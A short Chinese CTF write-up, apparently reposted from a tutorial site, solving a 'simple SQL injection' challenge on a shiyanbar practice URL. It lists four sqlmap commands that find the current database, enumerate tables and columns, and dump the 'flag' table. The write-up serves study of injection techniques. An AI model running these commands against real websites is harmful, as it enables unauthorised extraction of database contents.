微智科技网
您的当前位置:首页ctf题库--简单的sql注入③

ctf题库--简单的sql注入③

来源:微智科技网
  • 查看当前数据库:

Sqlmap -u "http://ctf5.shiyanbar.com/web/index_3.php?id=1" --current-db

  • 查看(猜解)表:

Sqlmap -u "http://ctf5.shiyanbar.com/web/index_3.php?id=1" -D web1 --tables

  • 查看(猜解)flag表的列:

Sqlmap -u "http://ctf5.shiyanbar.com/web/index_3.php?id=1" -D web1 -T flag -columns

  • 将flag表中的flag值dump一下:

Sqlmap -u "http://ctf5.shiyanbar.com/web/index_3.php?id=1" -D web1 -T flag -C flag --dump

即可得到最终的值:

后记:如果不熟悉sqlmap,则最先应记住几个常用的注入语句和常见的注入方法,必要时也可以考虑手工注入。

因篇幅问题不能全部显示,请点此查看更多更全内容